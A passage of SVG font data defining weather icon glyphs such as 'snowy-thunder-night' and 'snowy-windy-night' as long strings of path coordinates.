4-4-4 4-4h-8l0-6z m12-46h6l0 13 7 8c-2 1-3 2-4 4l-7-8-14 0v-5h8l-4-5 4-4 4 5 0-8z m58 40l-4 4-10-10h-10c0 0 0-1 0-2 0-1 0-2 0-3h10l10-10 4 4-6 6h6v5h-6l6 6z m-23 24l0-14-7-7c1-1 3-3 4-4l7 7 14 0v6h-8l4 4-4 4-4-4v8l-6 0z m18-47l-14 0-7 8c-1-2-3-3-4-4l7-8 0-13h6v8l4-5 4 4-4 5h8l0 5z m-33 25c-5 0-10-5-10-10 0-6 5-10 10-10 6 0 10 4 10 10s-4 10-10 10z m-228 83v-14l-13 13-9-9 22-22v-23c2 0 4 1 6 1s4-1 6-1v23l22 22-9 9-13-13v14h-12z m12-114c-2 0-4 0-6 0s-4 0-6 0v-23l-22-22 9-9 13 13v-14h12v14l13-13 9 9-22 22 0 23z m-35 23c0 2-1 5-1 7 0 2 1 4 1 6h-23l-22 22-9-9 13-13h-14v-13h14l-13-12 9-9 21 21h24z m-43 39l30 0 17-16c2 3 5 6 9 9l-17 16 0 31-12 0 0-18-10 9-9-9 10-9-18 0v-13z m47-48l-17-17-30 0-1-12 19 0-10-10 9-9 9 10 0-18 13 0 0 30 17 17c-4 2-7 5-9 9z m109 35l-9 9-22-22h-23c0-2 1-4 1-6 0-2-1-4-1-6h23l22-22 9 9-13 13h14v12h-14l13 13z m-50 53l0-31-17-16c4-3 7-6 9-9l17 16 30 0 0 13-18 0 10 9-9 9-10-9 1 18-13 0z m39-105l-30 0-17 17c-2-4-5-7-9-9l17-17 0-31 12 1 0 18 10-10 9 9-10 10 18 0v12z m-73 55c-12 0-23-10-23-22s11-23 23-23 23 10 23 23c0 12-10 22-23 22z m124-107v4h-5v-4l-4 4-3-3 7-7v-8c1 0 2 0 3 0 0 0 1 0 2 0v8l7 7-3 3-4-4z m0-34c-1 0-2 0-2 0s-2 0-2 0v-8l-8-7 3-3 5 4v-5h4v5l4-4 3 3-7 7 0 8z m-12 8c0 0-1 1-1 2 0 1 1 1 1 2h-8l-8 7-3-3 5-4h-5v-4h5l-5-5 3-3 8 8 8 0z m-15 13l10 0 6-6c1 2 2 3 3 3l-6 6 0 10h-4v-6l-3 4-3-4 3-3h-6l0-4z m16-17l-6-5-10 0v-4h6l-3-4 3-3 3 3v-6h4l1 11 5 5c-1 1-2 2-3 3z m37 12l-3 3-7-7h-8c0-1 0-1 0-2 0-1 0-2 0-2h8l7-8 3 3-4 5h4v4h-4l4 4z m-17 18l0-10-6-6c2 0 3-1 3-3l6 6 10 0v4h-6l4 3-3 3-4-3v6h-4z m14-35l-11 0-6 5c0-1-1-2-3-3l6-5 0-11h5v6l3-3 3 3-3 4h6l0 4z m-25 19c-5 0-8-4-8-8 0-4 3-8 8-8 4 0 7 4 7 8 0 4-3 8-7 8z m213 148v-5l-4 4-3-3 7-7v-8c1 0 1 0 2 0 1 0 2 0 2 0v8l8 7-3 3-5-4v5h-4z m4-40c0 0-1 0-2 0-1 0-1 0-2 0v-8l-7-7 3-3 4 4v-5h5v5l4-4 3 3-7 7v8z m-12 8c0 1 0 2 0 2 0 1 0 2 0 3h-8l-7 7-4-3 5-4h-5v-5h5l-5-4 3-3 8 7h8z m-15 14l11 0 6-6c0 1 1 2 3 3l-6 6 0 11h-5v-7l-3 4-3-3 3-4h-6v-4z m17-17l-6-6-11 0v-4h6l-3-4 3-3 3 4v-7h5l0 11 6 6c-2 1-3 2-3 3z m37 12l-3 3-7-7h-8c0-1 0-2 0-2 0-1 0-2 0-3h8l7-7 3 3-4 4h5v5h-5l4 4z m-17 18l0-10-6-6c1-1 2-2 3-3l6 6 11 0v4h-6l3 3-3 4-4-4v6h-4z m14-36l-11 0-6 6c-1-1-2-2-3-3l6-6 0-11h4v7l4-4 3 3-4 4h7v4z m-18 11c0-4-3-7-8-7s-8 3-8 7 4 8 8 8 8-3 8-8z m-124-140v-3l-4 3-2-2 6-5v-6c0 0 1 0 1 0s1 0 2 0v6l5 5-2 2-4-3v3l-2 0z m3-27c-1 0-1 0-2 0s-1 0-1 0v-6l-6-5 3-2 3 3v-4h3v4l3-3 2 2-5 5 0 6z m-9 5c0 1 0 1 0 2s0 1 0 1h-6l-5 6-2-3 3-3h-3v-3h3l-3-3 2-2 5 5 6 0z m-10 10h7l4-4c1 1 1 1 2 2l-4 4v7h-3v-4l-2 2-2-2 2-2h-5l1-3z m11-12l-4-4h-7v-3h4l-2-2 2-3 2 3v-5h3v8l4 4c-1 0-1 1-2 2z m27 9l-3 2-5-6h-6c0 0 1-1 1-1s-1-1-1-2h6l5-5 3 2-4 4h4v3h-4l4 3z m-7 10l-3-2v4h-3v-7l-4-4c1 0 2-1 2-2l4 4h8v3h-5l3 2-2 2z m4-23h-8l-4 4c0-1-1-2-2-2l4-4v-8h3v5l3-3 2 3-2 2h4l0 3z m-12 8c0-3-3-6-6-6-3 0-5 3-5 6 0 3 2 5 5 5s6-2 6-5z m-113 140v-2l-3 2-1-1 4-4v-5c0 1 0 1 1 1 0 0 1 0 1-1v5l4 4-2 1-2-2v2h-2z m0-27v-2h2v2l2-2 2 1-4 4v4c0 0-1 0-1 0-1 0-1 0-1 0v-4l-4-4 1-1 3 2z m-14 11h3l-3-2 2-1 4 3h4c0 1 0 1 0 2 0 0 0 0 0 1h-4l-4 4-2-2 3-2h-3v-3z m2 7h5l3-3c1 1 1 1 2 2l-3 3v5h-2v-3l-2 2-2-2 2-2h-3v-2z m7-18v5l3 3c-1 0-1 1-2 2l-3-3h-5v-2h3l-2-2 2-2 2 2v-3h2z m19 17l-4-3h-4c0-1 0-1 0-2 0 0 0 0 0-1h4l4-4 2 2-3 2h3v3h-3l3 2-2 1z m-7 8v-5l-3-3c0 0 1-1 1-2l3 3h6v2h-3l1 2-1 2-2-2v3h-2z m7-18h-6l-3 3c0-1-1-1-1-2l3-3v-5h2v3l2-2 1 2-1 2h3v2z m-9 5c0-2-2-4-4-4-2 0-4 2-4 4s2 4 4 4 4-1 4-4z" />
<glyph glyph-name="snowy-thunder-night" horiz-adv-x="1000" unicode="&#xee77;" d="M814 404c-45 43-97 56-156 34-11-4-15-4-20 9-39 95-128 147-229 136-92-11-165-84-182-183-1-6 0-14-8-17-16-7-29-16-39-28l-1 0s-77-73-1-158c2-2 4-5 6-7 1-1 1-1 1-1l0 0c19-18 42-28 71-31 30-3 60 0 90-1 11 0 13 6 15 14 14 52 28 103 42 154 3 10 7 15 19 15 40-1 80-1 120 0 13 0 15-4 12-15-9-29-16-57-25-89h129c-19-27-36-51-56-79 39 0 75-1 110 0 62 3 107 33 132 89 24 54 12 117-30 158z m-305-194c-12-1-17 1-13 15 9 25 14 50 21 75 3 10 1 13-9 12-23 0-45 0-68 0-7 0-12-2-14-9-14-50-28-100-42-150-2-8 0-12 9-11 18 0 36-1 53 0 14 0 19-1 15-17-14-55-26-111-39-166l3-3c59 84 119 168 180 254-35 0-66 0-96 0z m73 493c-26-21-41-49-44-82-1-13 1-25 3-37 42-17 77-48 102-88 4-1 8-1 13-1 69 1 114 60 114 107-17-20-37-32-62-34-26-2-48 5-68 22-16 14-26 32-29 53-5 32 5 60 28 84-22-2-41-10-57-24z m-39 45c2 0 2-1 3-2l3-13c0-4 4-5 7-2l8 10c1 1 2 2 4 1l13-1c3 0 5 4 4 6l-7 12c-1 1-1 2-1 3l5 13c2 3-1 6-4 5l-13-3c-1-1-3 0-4 1l-10 8c-2 3-6 1-6-2l-1-14c0-1-1-2-2-3l-12-6c-2-2-2-6 1-8l12-5z m220-127l13-5c1 0 2-1 2-3l3-13c1-3 5-4 7-1l8 10c1 1 3 2 4 1l13-1c3 0 6 3 4 6l-7 11c-1 2-1 3-1 4l6 12c1 3-2 7-5 6l-13-3c-1-1-2 0-3 0l-10 9c-3 2-7 1-7-2l-1-14c0-1-1-2-2-3l-11-7c-3-1-3-6 0-7z m-95 28c1 0 2-1 2-2l2-9c0-2 3-2 4-1l6 7c1 1 1 1 2 1l9-1c2 0 4 3 3 4l-5 8c-1 1-1 2 0 2l3 8c1 2-1 5-3 4l-9-2c0 0-1 0-2 0l-7 6c-1 2-4 1-4-2l-1-8c0-1 0-2-1-2l-7-5c-2-1-2-4 0-5l8-3z m85 28c0 0 1-1 1-1l1-6c0-2 2-2 3-1l4 5c0 0 1 0 2 0l6 0c1 0 2 1 1 2l-3 6c0 0 0 1 0 1l2 6c1 1 0 3-2 2l-6-1c0-1-1 0-1 0l-5 4c-1 1-3 0-3-1l0-6c0-1-1-1-1-2l-5-3c-2-1-1-2 0-3l6-2z m-228 4c1 0 1 0 1-1l1-5c1-1 2-1 3 0l3 4c1 0 1 0 2 0l5 0c1 0 2 1 1 2l-2 5c-1 0-1 1-1 1l2 5c1 1 0 2-1 2l-5-1c-1 0-1 0-2 0l-3 3c-1 1-3 1-3-1l0-5c0 0-1-1-1-1l-4-3c-2 0-1-2 0-2l4-3z m57-607v-6l-5 6-4-4 9-9v-10c1 0 2 0 3 0 1 0 2 0 3 0v10l9 9-4 4-5-6v6h-6z m6-48c-1 0-2 0-3 0-1 0-2 0-3 0v-10l-9-10 4-3 5 5v-6h6v6l5-5 4 3-9 10 0 10z m-15 10c-1 1-1 1-1 2 0 1 0 2 1 3h-10l-10 9-4-3 6-6h-6v-5h6l-6-6 4-3 9 9 11 0z m-19 16l13 0 7-7c1 2 3 3 4 4l-7 7 0 13h-5v-8l-5 5-3-4 4-4h-8l0-6z m20-20l-7-8-13 1v-6h8l-4-4 4-4 4 4v-7h5l0 13 7 7c-1 1-3 2-4 4z m47 15l-4 3-9-9h-10c0-1 0-2 0-3 0-1 0-1 0-2h10l9-10 4 4-5 6h6v5h-6l5 6z m-21 22l0-13-8-7c2-1 3-2 4-4l7 7 13 0v6h-7l4 4-4 4-4-5v8l-5 0z m16-44l-13-1-7 8c-1-2-2-3-4-4l8-7 0-13h5v7l4-4 4 4-4 4h8l-1 6z m-31 4c5 0 10 4 10 9 0 6-5 10-10 10-5 0-10-4-10-10 0-5 5-9 10-9z m-318 75v-10l-9 9-7-6 16-16v-17c2 0 3 0 5 0s3 0 4 0v17l16 16-6 6-10-9v10h-9z m10-83c-2 0-3-1-5-1-2 0-3 1-4 1v-17l-16-16 6-7 10 10v-10h9v10l9-10 7 7-16 16v17z m-26 17c-1 1-1 3-1 4 0 2 0 3 1 5h-17l-16 16-7-7 10-9h-10v-9h10l-10-10 7-6 16 15 17 1z m-32 28l22 0 13-12c1 3 3 5 6 6l-12 13 0 22h-9l0-13-7 7-7-7 7-7-13 0 0-9z m35-35l-13-13-22 1v-10l13 0-7-7 7-6 7 7 0-14h9l0 23 12 12c-2 2-5 4-6 7z m79 25l-6 7-16-16h-17c0-2 0-3 0-5 0-1 0-3 0-4h17l16-16 6 7-9 9h10v9h-10l9 9z m-36 39l0-22-13-12c3-2 5-4 7-7l12 12 22 0v9l-13 0 7 7-6 7-7-7 0 13-9 0z m28-76l-22 0-12 12c-2-3-4-5-7-7l13-12 0-22h9l0 13 7-7 6 6-7 7 13 1v9z m-53 40c-9 0-17-8-17-17 0-9 8-16 17-16 9 0 16 7 16 16 1 9-7 17-16 17z m422 45v-5l-4 4-3-3 7-7v-8c1 0 1 0 2 0s2 0 2 0v8l8 7-3 3-5-4v5h-4z m4-38c0 0-1 0-2 0-1 0-1 0-2 0v-8l-7-7 3-3 4 4v-5h4v5l5-4 3 3-8 7v8z m-12 8c0 0 0 1 0 2s0 1 0 2h-7l-8 7-3-3 5-4h-5v-4h5l-5-5 3-3 8 8h7z m-14 12l10 1 6-6c0 1 1 2 3 3l-6 6 0 10h-4v-6l-4 3-3-3 4-3h-6l0-5z m16-16l-6-5-10 0v-4h6l-3-4 3-3 3 4v-7h4l0 11 6 5c-1 1-2 2-3 3z m36 12l-3 3-7-7h-8c0-1 0-2 0-2 0-1 0-2 0-3h8l7-7 3 3-4 4h5v5h-5l4 4z m-17 18l0-11-5-5c1-1 2-2 3-3l5 5 11 0v5h-7l4 3-3 3-4-3v6h-4z m14-35l-11 0-5 5c-1-1-2-2-3-3l5-5 1-11h4v7l3-4 3 3-3 4h6l0 4z m-17 11c0-5-4-8-8-8s-7 3-7 8 3 7 7 7 8-3 8-7z m-186-124v-3l-3 3-2-2 5-5v-6c0 0 1 0 2 0s1 0 1 0v6l5 5-2 2-3-3v3h-3z m3-27c0 0-1 0-2 0s-1 0-1 0v-5l-5-5 2-2 3 3v-4h3v4l3-3 2 2-5 5 0 5z m-8 6c0 0 0 1 0 1s0 1 0 2h-6l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5 6 0z m-10 9h7l4-4c0 1 1 2 2 2l-4 4v7h-3v-4l-2 2-2-2 2-2h-4v-3z m11-11l-4-4h-7v-3h4l-2-2 2-3 2 3v-5h3v8l4 3c-1 1-2 2-2 3z m25 8l-2 2-5-5h-6c1-1 1-1 1-2s0-1-1-1h6l5-5 2 2-3 3h3v3h-3l3 3z m-10 3h8v3h-5l3 2-2 2-3-2v4h-3v-7l-4-4c1 0 2-1 3-2l3 4z m8-15h-8l-3 3c-1 0-2-1-3-2l4-3v-8h3v5l3-3 2 2-3 3h5v3z m-12 7c0-3-3-5-5-5-3 0-6 2-6 5 0 3 3 6 6 6 2 0 5-3 5-6z m-141 104v-2l-3 2-1-1 4-4v-4c0 0 0 0 1 0s0 0 1 0v4l3 4-1 1-2-2v2h-2z m2-19c-1 0-1 0-1 0-1 0-1 0-1 0v-4l-4-4 2-1 2 2v-3h2v3l2-2 2 1-4 4 0 4z m-6 4c0 0 0 1 0 1 0 0 0 1 0 1h-4l-4 4-2-2 3-2h-3v-2h3l-3-2 2-2 4 4h4z m-8 6h6l2-2c1 0 1 1 2 1l-3 3v5h-2v-3l-2 2-1-2 1-2h-3v-2z m8-8l-3-3h-5v-2h3l-1-1 1-2 2 2v-3h2v5l3 3c-1 0-1 1-2 1z m19 6l-2 2-3-4h-4c0 0 0-1 0-1s0-1 0-1h4l3-4 2 2-2 2h2v2h-2l2 2z m-9 9v-5l-3-3c1 0 2-1 2-1l3 2h5v3h-3l2 1-2 2-1-2v3l-3 0z m7-18h-5l-3 3c0 0-1-1-2-1l3-3v-5h2v3l2-2 2 2-2 1h3v2z m-8 6c0-2-2-4-4-4s-4 2-4 4c0 2 2 4 4 4s4-2 4-4z" />
<glyph glyph-name="snowy-thunder-sunny" horiz-adv-x="1000" unicode="&#xee78;" d="M842 402c-48 47-106 61-170 37-12-4-17-4-22 9-42 105-139 162-250 149-101-12-181-92-199-200-1-6 0-15-8-18-18-7-32-18-44-31l0 0s-85-80-2-173c2-2 5-5 7-7l1-2 0 1c21-20 46-31 78-34 32-3 65-1 98-1 12-1 14 6 17 16l46 168c3 11 7 16 20 16 44-1 88-1 132 0 14 0 16-4 12-17-9-31-17-62-27-96h141c-21-30-40-57-61-87 43 0 81-1 120 0 68 3 117 36 144 98 26 58 14 127-33 172z m-333-213c-13 0-19 2-13 17 8 27 14 55 23 82 3 11 0 14-10 14-25-1-50-1-75 0-8 0-13-3-15-11-15-54-30-109-46-164-2-8 0-12 10-12 19 1 39 0 58 0 15 1 21 0 16-18-16-60-29-121-43-182l3-2c65 91 130 182 197 277-38 0-72 0-105-1z m171 348c-6 3-11 2-17-2-8-7-6-21 4-26 12-7 25-13 37-19 11-5 15-5 25 3 0 1 1 3 2 4 0 1 0 2 0 2 1 8-2 14-9 17-14 7-28 14-42 21z m-229 98c-3-5-4-9-6-14 79 2 149-33 194-95 2 3 5 7 7 11 27 53 5 119-49 146-54 27-119 6-146-48z m222-39c-1-6 2-13 8-16 2-1 5-2 7-2 16 1 32 2 49 3 8 0 14 8 13 16 0 8-6 15-15 15-16-1-33-2-50-3-6-1-11-6-12-13z m-67 98c8-4 17-1 21 7 4 7 7 14 10 21l10 20 1 0c3 8 0 18-7 21-8 4-17 1-21-7-7-13-14-27-21-41-4-8-1-17 7-21z m-232-39l21-10c7-3 14-7 20-10 8-4 17-2 21 6 4 7 2 17-6 21-14 8-28 15-43 22-8 3-17 0-20-8-4-8-1-17 7-21z m284-10c5-2 10-3 15 0 14 9 27 18 41 27 7 5 8 14 3 21-4 7-13 9-20 5-14-9-28-18-41-27-10-6-8-21 2-26z m-125 67c11-6 23 2 22 14 0 16-2 31-3 47 0 9-7 15-16 14-9 0-15-7-15-16 1-15 2-31 3-46 1-6 3-11 9-13z m-76-18c2-2 4-4 6-5 7-4 14-2 19 3 5 5 6 13 2 19-9 13-17 26-26 39-5 7-15 9-22 4-7-5-9-14-4-22 8-12 17-25 25-38z m107-653v-6l-6 6-4-4 10-10v-11c1 0 2 0 3 0s2 0 3 0v11l10 10-4 4-6-6v6h-6z m6-53c-1 0-2 0-3 0s-2 0-3 0v-11l-10-10 4-4 6 6v-6h6v6l6-6 4 4-10 10v11z m-17 11c0 1 0 2 0 3s0 2 0 3h-11l-10 10-4-4 6-6h-7v-6h7l-6-6 4-4 10 10 11 0z m-20 18l14 0 8-7c1 1 3 3 4 4l-8 8 0 14h-6v-9l-4 5-4-4 4-5h-8l0-6z m22-23l-8-7-14 0v-6h8l-4-5 4-4 5 5v-9h5l1 14 7 8c-1 1-3 3-4 4z m51 17l-4 4-10-10h-11c0-1 0-2 0-3s0-2 0-3h11l10-10 4 4-6 6h7v6h-7l6 6z m-19 6l14 0v6h-8l4 5-4 4-5-5v9h-5l-1-15-7-7c1-1 3-3 4-5l8 8z m14-30l-14 0-8 7c-1-1-2-3-4-4l8-8 0-14h6v9l4-5 4 4-4 5h8l0 6z m-34 4c6 0 10 5 10 11 0 6-4 11-10 11-6 0-11-5-11-11s5-11 11-11z m-348 83v-11l-10 10-7-7 17-18v-18c2 0 4 0 5 0s4 0 5 0v18l18 18-7 7-11-10v11h-10z m10-91c-1-1-3-1-5-1s-3 1-5 1v-19l-17-17 7-7 10 10v-11h10v11l11-10 7 7-18 17v19z m-28 18c0 2 0 4 0 5 0 2 0 4 0 5h-19l-17 18-7-7 10-11h-11v-10h11l-10-10 7-7 17 17 19 0z m-35 31l25 0 13-13c2 3 5 5 7 7l-13 13 0 25h-10l0-15-8 8-7-7 8-8-14 0-1-10z m38-39l-13-13-24 0v-10l14 0-8-8 7-7 8 8 0-14h10l0 24 13 13c-2 2-5 5-7 7z m87 29l-7 7-17-18h-19c1-1 1-3 1-5s0-3-1-5h19l17-17 7 7-10 10h11v10h-11l10 11z m-40 42l0-25-13-13c3-2 5-4 7-7l13 13 25 0v10l-15 0 8 8-7 7-8-7 0 14-10 0z m32-84l-25 0-13 13c-2-2-4-5-7-7l13-13 0-24h10l0 14 8-8 7 7-8 8 15 0v10z m-59 44c-10 0-18-8-18-18s8-18 18-18c10 0 18 8 18 18s-8 18-18 18z m462 49v-5l-5 5-3-3 8-8v-9c1 0 2 1 2 1 1 0 2-1 3-1v9l8 8-4 3-4-5v5h-5z m5-41c-1 0-2 0-3 0-1 0-1 0-2 0v-9l-8-8 3-3 5 5v-5h4v5l5-5 3 3-8 8 1 9z m-13 8c-1 1-1 2-1 3 0 1 0 1 1 2h-9l-8 8-3-3 5-5h-6v-4h6l-5-5 3-3 8 8 9-1z m-16 15l11 0 6-6c1 1 2 2 3 3l-6 6 0 11h-4v-7l-4 4-3-3 3-4h-6l0-4z m17-18l-6-6-11 0v-5h6l-3-3 3-3 4 3v-6h4l0 11 6 6c-1 0-2 2-3 3z m40 13l-3 3-8-8h-9c0-1 0-2 0-2 0-1 0-2 0-3h9l8-8 3 3-5 5h5v5h-5l5 5z m-18 19l0-11-7-6c2-1 3-2 4-3l6 6 11 0v4h-7l4 4-3 3-4-4v7h-4z m14-38l-11 0-6 6c-1-2-2-3-4-3l7-6 0-12h4v7l4-4 3 4-4 3h7v5z m-18 12c0-5-4-9-9-9s-8 4-8 9c0 4 4 8 8 8s9-4 9-8z m-351-43v-3l-2 2-2-1 4-4v-5c1 0 1 0 1 0s1 0 2 0v5l4 4-2 1-3-2v3h-2z m3-22c0 0-1 0-1 0-1 0-1 0-1 0v-4l-4-4 1-2 3 3v-3h2v3l3-3 1 2-4 4 0 4z m-7 5c0 0 0 1 0 1 0 0 0 1 0 1h-4l-4 4-2-2 3-2h-3v-3h3l-3-2 2-2 4 4 4 1z m-8 7h6l3-3c0 1 1 1 2 2l-3 3v5h-3v-3l-2 2-1-2 2-2h-4l0-2z m9-9l-3-3h-6v-3h4l-2-1 1-2 2 2v-4h3v6l3 3c-1 1-2 1-2 2z m20 6l-2 2-4-4h-4c0 0 0-1 0-1 0 0 0-1 0-1h4l4-4 2 2-2 2h2v2h-2l2 2z m-9 10v-5l-3-3c0-1 1-1 1-2l4 3h5v2h-3l2 2-2 2-2-2v3l-2 0z m7-19h-5l-4 3c0-1-1-1-1-2l3-3v-5h2v3l2-2 2 2-2 2h3l0 2z m-9 6c0-2-2-4-4-4-3 0-5 2-5 4 0 2 2 4 5 4 2 0 4-2 4-4z" />
<glyph glyph-name="snowy-thunder" horiz-adv-x="1000" unicode="&#xee79;" d="M886 515c-55 53-120 68-192 42-13-5-19-6-25 10-47 117-156 181-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-7 8-9 1-1 1-1 2-2l0 1c22-22 51-35 87-39 36-3 73 0 110-1 14 0 16 8 19 18 17 63 35 126 52 189 3 13 8 19 23 19 49-1 98-1 147 0 16 0 19-5 14-19-10-35-19-70-30-109h159c-24-33-45-63-69-97 48 0 92-1 135 0 77 3 132 40 163 110 29 66 14 143-37 194z m-375-240c-15 0-21 2-16 20 10 30 17 61 26 92 4 11 1 15-11 15-28-1-56-1-84 0-9 0-14-3-17-12-17-61-34-123-51-184-3-10-1-14 11-14 21 0 43-1 65 0 16 1 23 0 18-21-17-67-32-136-48-204l4-3c73 103 146 206 221 312-43 0-81 0-118-1z m90-166v-7l-7 7-4-5 11-11v-13c1 0 2 0 3 0 1 0 3 0 4 0v12l11 12-5 5-6-7v7h-7v0z m7-60c-1 0-2 0-4 0s-2 0-3 0v-12l-11-11 4-5 7 7v-8h7v8l7-7 4 5-11 11 0 12z m-19 13c0 1 0 2 0 3 0 1 0 2 0 3h-12l-12 12-4-5 6-7h-7v-7h7l-6-6 4-5 12 11 12 1z m-23 20l17 0 8-9c2 2 3 4 5 5l-9 9 0 16h-7v-10l-5 5-4-4 5-5h-10l0-7z m25-26l-9-8-16 0v-7h10l-5-5 4-5 5 5v-9h7l0 16 9 9c-2 1-4 3-5 4z m58 19l-5 5-11-12h-13c0-1 1-2 1-3 0-1-1-2-1-4h13l11-11 5 5-7 7h7v6h-7l7 7z m-27 28l0-16-9-9c2-1 4-3 5-5l9 9 16 0v6h-10l6 5-5 5-5-5v10l-7 0z m21-55l-16 0-9 8c-1-2-3-3-5-4l9-9 0-16h7v9l5-5 5 5-5 5h9l0 7z m-39 5c7 0 12 5 12 12 0 6-5 12-12 12-6 0-11-6-11-12 0-7 5-12 11-12z m-390 92v-12l-12 11-8-8 20-19v-21c2 0 3 0 5 0s4 0 6 0v21l19 19-7 8-12-11v12h-11z m11-102c-2 0-4 0-6 0s-3 0-5 0v-21l-20-19 8-8 12 11v-12h11v12l12-11 7 8-19 19v21z m-32 21c0 2 0 4 0 6 0 2 0 3 0 5h-21l-19 20-8-8 11-12h-12v-11h12l-11-12 8-7 19 19h21z m-39 35l28 0 15-15c2 3 5 6 8 8l-15 15 0 27h-11l0-16-9 9-8-8 9-9-17 0 0-11z m43-44l-15-15-28 0v-11l16 0-8-9 8-8 8 9 0-16h11l1 27 15 15c-3 2-6 5-8 8z m98 32l-8 8-20-20h-21c0-2 1-3 1-5 0-2-1-4-1-6h21l20-19 8 7-12 12h13v11h-13l12 12z m-45 47l0-27-15-15c3-2 6-5 8-8l15 15 27 0v11l-16 0 9 9-8 8-9-9 0 16-11 0z m35-94l-28 0-15 15c-2-3-4-6-8-8l15-15 1-27h11l0 16 8-9 8 8-8 9 16 0 0 11z m-66 50c-11 0-20-9-20-20 0-12 9-21 20-21 12 0 21 9 21 21 0 11-9 20-21 20z m519 55v-6l-5 6-3-4 8-9v-9c1 0 2 0 3 0 1 0 2 0 3 0v9l9 9-4 4-5-6v6h-6z m6-47c-1 0-2 0-3 0-1 0-2 0-3 0v-9l-9-9 4-4 5 6v-6h5v6l6-6 3 4-9 9v9z m-15 10c0 1 0 2 0 3 0 0 0 1 0 2h-10l-9 9-3-4 5-5h-6v-5h6l-5-5 3-4 9 9h10z m-18 16l13 0 7-7c1 2 2 3 3 4l-7 7 0 12h-5v-7l-4 4-3-4 4-4h-8l0-5z m20-20l-7-7-13 0v-5h8l-4-4 3-4 4 4v-7h5l1 13 6 6c-1 1-2 2-3 4z m44 14l-3 4-9-9h-10c0-1 1-2 1-3 0 0-1-1-1-2h10l9-9 3 4-5 5h6v5h-6l5 5z m-20 22l0-12-7-7c1-1 3-2 4-4l6 7 13 0v5h-7l4 4-4 4-4-4v7l-5 0z m16-43l-13 0-6 7c-1-2-3-3-4-4l7-7 0-12h5v7l4-4 4 4-4 4h7l0 5z m-21 14c0-6-4-10-9-10-5 0-9 4-9 10 0 5 4 9 9 9 5 0 9-4 9-9z m-393-49v-3l-3 3-2-2 5-4v-5c0 0 0 0 1 0l1 0v5l5 4-2 2-3-3v3h-2z m2-24c0 0-1 0-1 0l-1 0v-4l-5-5 2-2 3 3v-3h2v3l3-3 2 2-5 5v4z m-7 5c0 1 0 1 0 2 0 0 0 0 0 1h-5l-5 4-1-1 2-3h-3v-3h3l-2-2 1-2 5 4h5z m-9 8h6l4-3c0 1 1 1 1 2l-3 3v7h-3v-4l-2 2-2-2 3-2h-4v-3z m10-10l-4-3h-6v-3h4l-2-2 1-2 2 2v-4h3v7l4 3c-1 1-2 1-2 2z m22 8l-1 1-5-4h-5c0-1 0-1 0-1l0-2h5l5-4 1 2-2 2h3v3h-3l2 3z m-10 11v-7l-3-3c0-1 1-1 1-2l4 3h6v3h-4l3 2-2 2-2-2v4h-3z m8-22h-6l-4 3c0 0-1-1-1-2l3-3v-7h3v4l2-2 2 2-3 2h4v3z m-10 7c0-3-2-5-5-5s-5 2-5 5 2 4 5 4 5-2 5-4z" />
<glyph glyph-name="snowy-windy-night" horiz-adv-x="1000" unicode="&#xee7a;" d="M530 420c-31 30-68 39-109 24-8-3-11-3-14 6-27 66-89 103-160 95-64-8-115-59-127-128-1-4 0-9-5-12-12-4-21-11-28-19v0s-54-52-1-111c1-1 3-3 4-5l1 0 0 0c13-13 29-20 50-22 20-2 41 0 62-1l179 1c27 0 52-1 76 0 44 1 75 22 93 62 16 38 8 82-21 110z m-197 126c28-11 52-32 69-60 3 0 6 0 9 0 47 0 77 40 78 73-12-14-26-22-43-23-17-2-32 3-46 14-11 10-17 22-20 36-3 23 4 42 20 58-15-2-28-7-40-17-17-14-27-33-29-55-1-9 0-18 2-26z m151 26l9-4c0 0 1-1 1-2l2-9c1-2 4-2 5-1l6 7c0 1 1 1 2 1l9 0c2-1 4 2 3 4l-5 7c-1 1-1 2 0 3l3 8c1 2-1 5-3 4l-9-2c-1 0-1 0-2 0l-7 6c-2 2-4 1-4-2l-1-9c0-1-1-1-1-2l-8-4c-2-2-2-5 0-5z m-64 19c0-1 1-1 1-2l1-6c0-1 2-2 3 0l4 4c0 1 1 1 2 1l6-1c1 0 2 2 1 3l-3 5c0 1 0 1 0 2l2 5c1 2 0 3-2 3l-6-2c0 0-1 0-1 1l-5 4c-1 1-3 0-3-2l0-6c0 0-1-1-1-1l-5-3c-2-1-1-3 0-3l6-2z m57 19c1 0 1-1 1-1l1-4c0-1 1-2 2-1l3 3c0 1 0 1 1 1l4-1c1 0 1 1 1 2l-2 4c0 0 0 1 0 1l1 4c1 1 0 2-1 1l-4-1c-1 0-1 0-1 1l-3 2c-1 1-2 1-2 0l-1-5c0 0 0 0 0-1l-4-2c-1 0-1-1 0-2l4-1z m-155 3c0 0 1-1 1-1l1-3c0-1 1-2 1-1l3 3c0 0 0 0 0 0l4 0c1 0 1 1 1 2l-2 3c0 0 0 0 0 1l1 3c1 1 0 1-1 1l-3-1c-1 0-1 0-1 0l-3 3c0 0-1 0-1-1l-1-3c0-1 0-1 0-1l-3-2c-1 0-1-2 0-2l3-1z m369-316c-38 0-77 0-115 0l-1 0c-8-19-20-34-36-44 52 0 104 0 155 0 54-1 94-44 89-96-4-38-47-66-81-53-27 10-40 43-25 64 13 17 37 18 51 2 8-10 20-11 30-4 9 7 11 19 5 30-14 24-47 36-77 28-58-15-77-81-42-130 16-22 38-33 64-38h25c9 3 19 5 29 9 58 26 83 94 54 154-25 53-67 78-125 78z m-95 125c13-1 24 6 24 19 1 21 17 34 31 35 21 1 40-13 46-32 10-34-17-73-52-76-22-2-44-2-67-1 5-14 6-29 4-44 20 0 39 0 58 0 56 0 105 50 104 106-1 52-38 89-90 91-41 2-77-34-77-75 0-13 8-22 19-23z m324 14c-17 20-40 28-66 23-24-6-39-21-46-45-1-5-1-10-1-15 0-12 8-20 20-21 11-1 20 6 23 17 4 17 10 22 22 20 14-2 23-16 21-30-3-20-19-33-42-33-28-1-56 0-84 0-13-1-21-6-24-16-3-14 5-27 20-28 17-1 35 0 52 0 23 1 46-3 68 4 52 18 72 84 37 124z m-558-246v-4l-4 4-2-2 6-7v-7c1 0 1 1 2 1 0 0 1-1 2-1v7l6 7-3 2-4-4v4h-3z m4-33c-1 0-2 0-2 0-1 0-1 0-2 0v-7l-6-6 2-3 4 4v-4h4v4l4-4 2 3-6 6 0 7z m-11 7c0 1 0 1 0 2 0 0 0 1 0 2h-7l-6 6-2-3 3-4h-4v-3h4l-3-4 2-3 6 7 7 0z m-12 11h9l5-5c0 1 1 2 2 3l-5 5v9h-3v-5l-3 2-3-2 3-3h-5l0-4z 